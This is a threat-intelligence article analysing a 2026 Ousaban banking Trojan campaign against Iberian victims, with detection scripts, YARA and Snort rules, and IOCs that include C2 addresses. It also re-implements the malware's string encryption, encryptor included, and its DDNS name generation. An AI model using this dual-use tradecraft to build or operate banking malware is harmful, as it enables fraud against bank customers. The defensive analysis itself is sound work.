Ousaban Banking Trojan 2026 Campaign: Geofenced Malware Delivery via Steganographic Payloads and Dynamic C2 Resolution

Introduction

The Ousaban banking Trojan, historically prolific across Latin American financial institutions, has re-emerged in a sophisticated campaign targeting the Iberian Peninsula since May 2026. This iteration represents a significant evolution in threat actor tradecraft, combining geofencing, environment-aware access controls, steganographic payload delivery, and dynamically resolved command-and-control (C2) infrastructure to evade detection and restrict exposure exclusively to Spanish and Portuguese victims. Understanding this multi-stage infection chain—from hex-escaped JavaScript in phishing PDFs to daily-changing DDNS hostnames—is essential for defenders seeking to detect, analyze, and mitigate this advanced banking malware.

Learning Objectives

  • Objective 1: Analyze the complete Ousaban infection chain, including PDF-based phishing, server-side geofencing, VBScript steganographic extraction, and persistence mechanisms.
  • Objective 2: Identify and implement detection strategies for geofencing evasion techniques, environment checks, and dynamic C2 resolution using DDNS and Pastebin decoys.
  • Objective 3: Apply threat hunting methodologies, including IOCs, memory forensics, and network traffic analysis, to uncover Ousaban activity in enterprise environments.

You Should Know

1. Phishing PDF with Hex-Escaped JavaScript and Deceptive UX

The attack commences with a PDF file disguised as a corrupted tax or documentation file. Upon opening, victims are presented with a deceptive message box containing an “Atualizar” (Update) button that links to a malicious webpage. The PDF embeds JavaScript code that is hex-escaped—a technique that obfuscates the script’s true intent and complicates static detection by security tools. This JavaScript automatically accesses the same malicious webpage, functioning as a secondary infection vector should the user fail to click the button.

Detection Strategy: Monitor for PDF files containing embedded JavaScript with hex-escaped characters. Use `pdfid.py` (Didier Stevens) to identify JavaScript and `peepdf` to analyze the obfuscated code:

```bash
# Triage: does the PDF declare /JS, /JavaScript, /OpenAction or /AA?
pdfid.py suspicious.pdf

# Analyze the obfuscated script in peepdf's console (-f forces parsing of damaged files)
peepdf -f -i suspicious.pdf
# inside the console: js_code <object_id>   (object id taken from peepdf's file summary)
```

Windows PowerShell alternative for initial triage (the backslash must be escaped in the pattern, and `-AllMatches` is needed to count every `\xNN` escape rather than the single matching line):

```powershell
# Count JavaScript-style \xNN escapes in the raw file; a high count is worth a closer look
$raw = Get-Content -Path suspicious.pdf -Raw
(Select-String -InputObject $raw -Pattern '\\x[0-9a-fA-F]{2}' -AllMatches).Matches.Count
# Does the file declare JavaScript at all?
(Select-String -InputObject $raw -Pattern '/JavaScript|/JS' -AllMatches).Matches.Count
```
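The two checks above can be combined into a small triage script. The following is an added example, not code from the original post or from the Fortinet analysis: it normalises `#xx`-escaped PDF names (so `/J#61vaScript` is still recognised as `/JavaScript`), counts script-related keys and `\xNN` escapes, and decodes the escapes so an analyst can read what the script actually does. The embedded PDF samples and the `example.invalid` URL are constructed for the demonstration.

```python
import re

# PDF names may be written with #xx escapes (e.g. /J#61vaScript == /JavaScript),
# which defeats a naive grep for the keyword, so names are normalised first.
PDF_NAME_ESCAPE = re.compile(rb'#([0-9A-Fa-f]{2})')
# JavaScript string escapes such as \x68\x74\x74\x70 ("http")
JS_HEX_ESCAPE = re.compile(rb'\\x([0-9A-Fa-f]{2})')
# Keys that declare script or auto-run behaviour
TRIGGER_KEYS = (b'/JavaScript', b'/JS', b'/OpenAction', b'/AA')

# Constructed samples (not real campaign files): one with hex-escaped JS, one benign.
SAMPLE_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 3 0 R /OpenAction 2 0 R >> endobj\n"
    b"2 0 obj << /S /J#61vaScript /JS (app.launchURL(\""
    b"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2fexample.invalid/update\", true)) >> endobj\n"
    b"3 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
BENIGN_PDF = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)


def normalise_pdf_names(data: bytes) -> bytes:
    """Decode #xx escapes in PDF name objects."""
    return PDF_NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def unescape_js(data: bytes) -> bytes:
    """Replace JavaScript \\xNN escapes with the bytes they encode."""
    return JS_HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data: bytes) -> dict:
    """Count script-related keys and hex escapes in uncompressed PDF content.

    Returns the key counts, the number of \\xNN escapes, the de-obfuscated
    content (only when JavaScript is present) and an overall verdict.
    """
    norm = normalise_pdf_names(data)
    counts = {key.decode(): norm.count(key) for key in TRIGGER_KEYS}
    escapes = JS_HEX_ESCAPE.findall(norm)
    has_js = counts['/JavaScript'] + counts['/JS'] > 0
    return {
        'keys': counts,
        'hex_escapes': len(escapes),
        'decoded': unescape_js(norm) if has_js else b'',
        'suspicious': has_js and len(escapes) > 0,
    }


if __name__ == '__main__':
    import sys
    # With a path argument the script triages that file; otherwise the built-in sample.
    data = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else SAMPLE_PDF
    result = triage_pdf(data)
    print({k: v for k, v in result.items() if k != 'decoded'})
```

The script only sees objects that are stored uncompressed; JavaScript inside a `/FlateDecode` stream must first be inflated (pdf-parser's filter option or peepdf's console do this), after which `triage_pdf` can be run over the decoded stream.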

2. Server-Side Geofencing and Environment Checks

Earlier versions of the malicious landing page performed client-side checks for language, timezone, IP geolocation, VPN indicators, browser behavior, screen resolution, rendering capability, and font enumeration to filter out sandboxes, crawlers, and non-target users. The updated campaign has shifted these checks to the server side. Users outside Spain and Portugal receive a PDF containing the message “Access denied. Service not available from your country”.

Why This Matters: Server-side checks obscure specific filtering criteria from security analysts, making it harder to reverse-engineer the exact conditions required to access the payload. Defenders must rely on network traffic analysis to infer these checks.

Linux Command to Identify Suspicious Inbound/Outbound Patterns:

```bash
# Monitor for connections to the C2 addresses listed in the IOC table (-nn: no name/port resolution)
sudo tcpdump -i any -nn 'host 213.159.64.191 or host 162.33.179.46' -v

# Enrich a suspicious IP with geolocation and ISP data (this sends the IP to a third-party service)
curl -s "http://ip-api.com/json/213.159.64.191" | jq '.country, .city, .isp'
```

3. VBScript Downloader and Steganographic Payload Extraction

Upon successful environment validation, the server delivers a VBS file containing numerous benign function calls alongside embedded malicious code. The VBScript downloads a PNG image file that visually resembles a PDF icon. However, a ZIP archive is concatenated to the end of that image, a classic steganographic trick: PNG decoders stop reading at the IEND chunk and ZIP readers locate the archive from the end-of-central-directory record at the end of the file, so the file still renders as a valid image while carrying an intact archive.

Step-by-Step Extraction Process:

  1. The VBS downloads the PNG from the C2 server.
  2. It reads the PNG file and locates the ZIP header (`PK\x03\x04`) appended at the end.
  3. The ZIP is extracted to the Temp folder.
  4. The Ousaban executable is dropped to `C:\SysMain_5874288\`.
  5. After execution, the VBS deletes the ZIP, PNG, and itself to minimize the forensic footprint.

Manual Extraction for Forensic Analysis:

```bash
# Identify the appended ZIP within the PNG and carve it out
binwalk suspicious.png
binwalk -e suspicious.png

# If binwalk fails, find the byte offset of the PK\x03\x04 signature and carve manually
grep -obUaP '\x50\x4b\x03\x04' suspicious.png
dd if=suspicious.png of=extracted.zip bs=1 skip=<offset>
```

Python Script for Steganographic Extraction:

```python
import os
import zipfile

PNG_IEND = b'IEND'
ZIP_LOCAL_HEADER = b'PK\x03\x04'


def extract_zip_from_png(png_path, output_path):
    """Carve a ZIP archive appended after a PNG's IEND chunk.

    Returns the byte offset of the ZIP, or -1 if no archive was found.
    """
    with open(png_path, 'rb') as f:
        data = f.read()
    # Search only after the IEND chunk so that a stray PK sequence inside
    # compressed image data is not mistaken for the payload.
    iend = data.rfind(PNG_IEND)
    start = iend + 8 if iend != -1 else 0   # 'IEND' + 4-byte CRC
    offset = data.find(ZIP_LOCAL_HEADER, start)
    if offset == -1:
        return -1
    with open(output_path, 'wb') as zip_file:
        zip_file.write(data[offset:])
    # Sanity-check the carved file before handing it to a sandbox
    if not zipfile.is_zipfile(output_path):
        os.remove(output_path)
        return -1
    return offset


# Usage
if __name__ == '__main__':
    print(extract_zip_from_png('suspicious.png', 'extracted.zip'))
```

4. Persistence and Configuration Decryption

Once executed, Ousaban establishes persistence by creating a registry value named `Financeiro` (Portuguese for “Finance”) under the `CurrentVersion\Run` key. It also creates an empty file named maisum.dat, using its creation timestamp as the installation date for tracking purposes.

Persistence Detection Commands:

```batch
:: Windows Registry Check (both hives, since the report does not state which one is used)
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Financeiro
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Financeiro

:: Check for maisum.dat anywhere on the system drive
dir C:\*.dat /s /b | findstr /i maisum
:: Show its creation time, which the malware uses as the installation date
dir /s /tc C:\maisum.dat
```

The malware decrypts bank-related strings using a custom algorithm widely employed by Latin American banking Trojans, including Casbaneiro. The first byte of each encrypted string is a random base offset. Every subsequent byte is XORed against the corresponding key character, and the offset is then subtracted from the result (adding 0xFF when it would go negative); the offset for the next byte is the current ciphertext byte.

Custom Decryption Logic (Python):

```python
def decrypt_ousaban_string(encrypted_data, key):
    """Decrypt one Ousaban string.

    encrypted_data: bytes; byte 0 is the random base offset.
    key: the string key; characters are consumed cyclically.
    """
    decrypted = []
    base_offset = encrypted_data[0]
    for i in range(1, len(encrypted_data)):
        xor_result = encrypted_data[i] ^ ord(key[(i - 1) % len(key)])
        if xor_result < base_offset:
            decrypted.append(xor_result + 0xFF - base_offset)   # wrap-around case
        else:
            decrypted.append(xor_result - base_offset)
        base_offset = encrypted_data[i]   # previous ciphertext byte becomes the next offset
    return bytes(decrypted).decode('latin-1')
```

Targeted Banks (Partial List from Figure 8):

  • Spanish and Portuguese financial institutions including Santander, CaixaBank, Banco de Portugal, and others.

5. Dynamic C2 Resolution with Pastebin Decoy and DDNS

Ousaban’s C2 infrastructure represents a masterclass in operational security. The malware decrypts a Pastebin link containing what appears to be configuration data with a private IP address. However, this is a deliberate decoy designed to divert researchers.

The real C2 IP is resolved through daily-changing DDNS hostnames. The subdomains consist of a hard-coded string “aki” concatenated with the first eight characters of an MD5 hash. This MD5 is generated from a hard-coded salt (a9f8b7c6e5d4f3a2b1c8d7e6f5g4h3i2j1k9l8m7n6o5p4q) combined with the current date.

Critical Observation: To obtain the current date, Ousaban deliberately accesses Google’s Automated Queries page and extracts the date from the response. This technique ensures the malware operates correctly regardless of system clock tampering.
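Because the label derivation is public, a defender can pre-compute the labels for the coming days and hunt for them in DNS logs. The following is an added example, not code from the original post or from the Fortinet analysis. It uses the salt and the `"aki"` prefix exactly as printed above, but the report does not say how the date is formatted or whether it is appended or prepended to the salt, so the script generates labels for several assumed formats and both orders; the DDNS zone in the sample log lines (`ddns.example`) and the log format itself are constructed.

```python
import hashlib
from datetime import date, timedelta

SALT = "a9f8b7c6e5d4f3a2b1c8d7e6f5g4h3i2j1k9l8m7n6o5p4q"   # as printed in the analysis
PREFIX = "aki"                                               # hard-coded label prefix
# ASSUMPTION: date format and concatenation order are not given in the report,
# so several candidates are generated and a hunt should cover all of them.
DATE_FORMATS = ("%d/%m/%Y", "%d-%m-%Y", "%Y-%m-%d", "%d%m%Y", "%Y%m%d")
HEX_CHARS = set("0123456789abcdef")


def ousaban_label(day, fmt, salt=SALT, date_first=False):
    """PREFIX + first 8 hex chars of MD5(salt + date) for one date/format pair."""
    stamp = day.strftime(fmt)
    material = (stamp + salt) if date_first else (salt + stamp)
    return PREFIX + hashlib.md5(material.encode()).hexdigest()[:8]


def predict_labels(start, days=3, formats=DATE_FORMATS, salt=SALT):
    """Candidate labels for `days` consecutive days, keyed by ISO date."""
    result = {}
    for n in range(days):
        day = start + timedelta(days=n)
        result[day.isoformat()] = sorted({
            ousaban_label(day, fmt, salt, date_first)
            for fmt in formats for date_first in (False, True)
        })
    return result


def is_candidate_label(label):
    """Shape check usable on its own in a DNS-log hunt: 'aki' + exactly 8 hex chars."""
    return (len(label) == 11 and label.startswith(PREFIX)
            and set(label[3:]) <= HEX_CHARS)


def match_dns_log(lines, candidates):
    """Return log lines whose queried name starts with a predicted label.

    Constructed log format: '<time> <client-ip> <queried-name>'.
    """
    hits = []
    for line in lines:
        qname = line.split()[-1].lower().rstrip('.')
        if qname.split('.')[0] in candidates:
            hits.append(line)
    return hits


if __name__ == '__main__':
    today = date.today()
    for day, labels in predict_labels(today).items():
        print(day, labels)
```

The malware fetches its date from Google rather than the local clock, so the prediction should be keyed to the real calendar date (and the day before and after, to absorb timezone differences) rather than to a host's possibly tampered clock. Pair the predicted labels with the generic shape check, since a label of the right shape on an unfamiliar DDNS zone is itself worth a look.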

Command Set Revealed by Analysis:

| Command | Purpose |
|---|---|
| `Convite` | Collect user information |
| `Handle` | Assign a victim ID |
| `ON-LINE` | Heartbeat |
| `xyScree` | Get screen resolution |
| `Iniciar` | Start screenshot capture and remote control |

Network Traffic Analysis (Snort/Suricata Rules):

```
alert tcp $HOME_NET any -> any any (msg:"Ousaban Heartbeat Detected"; flow:established,to_server; content:"ON-LINE"; nocase; sid:1000001; rev:1;)
alert tcp $HOME_NET any -> any any (msg:"Ousaban Convite Command"; flow:established,to_server; content:"Convite"; nocase; sid:1000002; rev:1;)
```

These rules only fire where the command strings travel in cleartext; since most Ousaban C2 traffic is encrypted with the string algorithm described above, treat them as a low-confidence hunting signal and correlate hits with the IP and DDNS indicators.

6. Encrypted Communications and Advanced Evasion

Most traffic between Ousaban and its C2 server is encrypted using the previously described algorithm. All encrypted data appears as different strings even when the plaintext is identical, complicating signature-based detection. The malware can execute remote commands including mouse/keyboard control, clipboard injection, keylogging, and generating fake messages to deceive victims.
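To see why identical plaintexts produce different ciphertexts, and to validate a decryptor against known input, it helps to have both directions of the scheme. The following is an added example, not code from the original post or from the Fortinet analysis: `ousaban_decrypt` re-implements the decryption described in section 4, and `ousaban_encrypt` is the inverse derived from it (random base offset, add the previous ciphertext byte with a wrap of 0xFF, XOR with the key character). The key `"chave"` and the plaintexts are constructed test values.

```python
import os


def ousaban_decrypt(ciphertext, key):
    """Decrypt: byte 0 is the base offset; each later byte is XORed with the key
    character and reduced by the previous ciphertext byte (wrapping by 0xFF)."""
    prev = ciphertext[0]
    out = bytearray()
    for i in range(1, len(ciphertext)):
        x = ciphertext[i] ^ ord(key[(i - 1) % len(key)])
        out.append(x + 0xFF - prev if x < prev else x - prev)
        prev = ciphertext[i]
    return bytes(out)


def ousaban_encrypt(plaintext, key, first_byte=None):
    """Inverse of ousaban_decrypt. first_byte fixes the base offset for
    reproducible tests; by default it is random, as in the malware.

    A plaintext byte of 0xFF is rejected: after wrapping it would equal the
    previous ciphertext byte, and the decryptor's '<' comparison would then
    decode it as 0x00. Latin-1 text never contains it."""
    if 0xFF in plaintext:
        raise ValueError("byte 0xFF is not representable by this scheme")
    prev = os.urandom(1)[0] if first_byte is None else first_byte
    out = bytearray([prev])
    for i, p in enumerate(plaintext):
        x = p + prev
        if x > 0xFF:
            x -= 0xFF                      # wrap so the byte stays in range
        c = x ^ ord(key[i % len(key)])
        out.append(c)
        prev = c                           # the ciphertext byte feeds the next step
    return bytes(out)


def ciphertext_variants(plaintext, key, n=5):
    """Encrypt the same plaintext n times with random offsets and return the
    hex forms, which is what a signature engine would see on the wire."""
    return [ousaban_encrypt(plaintext, key).hex() for _ in range(n)]


if __name__ == '__main__':
    for variant in ciphertext_variants(b"ON-LINE", "chave"):
        print(variant, ousaban_decrypt(bytes.fromhex(variant), "chave"))
```

Every variant decrypts to the same string while sharing no common byte sequence beyond chance, which is why the plaintext-content Snort rules above cannot match the encrypted channel and why the decryptor is the right tool for strings recovered from memory.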

YARA Rule for Ousaban Detection:

```yara
rule Ousaban_Banking_Trojan {
    meta:
        description = "Detects Ousaban banking Trojan based on string patterns"
        author = "Threat Researcher"
        date = "2026-07-02"
    strings:
        $convite = "Convite" ascii wide
        $online = "ON-LINE" ascii wide
        $iniciar = "Iniciar" ascii wide
        $financeiro = "Financeiro" ascii wide
        $sysmain = "SysMain_" ascii
    condition:
        any of ($convite, $online, $iniciar) and ($financeiro or $sysmain)
}
```

What Undercode Say

  • Key Takeaway 1: The shift from client-side to server-side geofencing represents a critical evolution in malware delivery, making it significantly harder for security researchers to reverse-engineer access controls without compromising an actual target machine in the Iberian Peninsula.

  • Key Takeaway 2: The Pastebin decoy combined with daily-changing DDNS hostnames and Google date extraction demonstrates an advanced understanding of defensive countermeasures—threat actors are actively building redundant, obfuscated C2 channels that resist takedown efforts.

Analysis: The Ousaban campaign exemplifies how banking Trojans have matured beyond simple credential theft into sophisticated, multi-stage operations with built-in anti-analysis capabilities. The use of steganography (appending ZIP to PNG) is particularly noteworthy—it bypasses many network security appliances that fail to inspect image files deeply. The encryption algorithm, while not cryptographically complex, remains effective due to its random base offset that ensures unique ciphertexts for identical plaintexts.

From a defensive perspective, organizations should prioritize email filtering for PDF attachments with embedded JavaScript, deploy endpoint detection solutions capable of analyzing VBScript behavior, and implement network monitoring for the specific command strings identified in this analysis. The dynamic C2 infrastructure demands proactive threat hunting—security teams should generate daily predictions of potential DDNS subdomains based on the known algorithm and proactively block them.

The most concerning aspect is the threat actor’s adaptability: the campaign has already evolved from late 2025 ClickFix techniques to the current PDF-and-geofencing approach. This suggests a well-resourced actor continuously refining their tradecraft based on defensive responses.

Prediction

  • +1 Geofenced malware delivery will become the standard for region-specific banking Trojans, forcing security vendors to develop more sophisticated geo-agnostic detection methods that focus on behavioral patterns rather than payload availability.

  • -1 Small and medium enterprises in Spain and Portugal without advanced threat detection capabilities remain highly vulnerable—the social engineering aspect (fake tax documentation) is particularly effective during tax seasons.

  • -1 The use of legitimate services like Pastebin and Google for C2 operations will likely increase, as threat actors continue to abuse trusted platforms to blend malicious traffic with legitimate activity.

  • +1 Threat intelligence sharing between Spanish and Portuguese financial institutions and cybersecurity agencies will improve as a direct response to this campaign, potentially leading to faster IOC dissemination and coordinated takedown efforts.

  • -1 The encryption algorithm’s longevity (used across multiple Latin American banking Trojans) indicates that static signature-based detection will remain ineffective against Ousaban variants—behavioral and memory-based detection are the only reliable defenses.

  • +1 Open-source threat hunting tools incorporating the DDNS prediction algorithm will emerge, enabling defenders to proactively block C2 domains before they are resolved by compromised hosts.

IOCs for Reference (Fortinet Report):

| Type | Indicators |
|---|---|
| Domains | faturanova[.]xyz, facture-in[.]pages[.]dev, facture-arsys[.]duckdns[.]org, faturanova[.]duckdns[.]org, controlfacturas[.]site |
| IPs | 213[.]159[.]64[.]191, 162[.]33[.]179[.]46, 91[.]92[.]240[.]140, 78[.]40[.]209[.]32 |
| PDF Hashes | 6bc2e11b0917f47d0557288c4f0cb20bd7589185943b989a969fdc6d3704ee73, 540ee1936e61d2344b5ebc93485589a351ec2f113a9b4940ae16f3baa4807392 |
| VBS Hashes | 5a2ed557c357ba8f96f2d55a8a00695987806b5df766cd1dfdab0cbed111774a, 19ac18a50abb48dc0ea9524850acfaec49359e6b3bcc67c6193c2d56da812c71 |
| EXE Hashes | ffb9eb47cc0cb2f43e04a10dc84df13d04bca1ebacbe47fad0b669728de2f59c, 18fd38988d58dd930f5992d448cc09a9400c1eafba76b820b9a83239ac48cf4e |


Reported By: Flavioqueiroz Cybercrime – Hackers Feeds
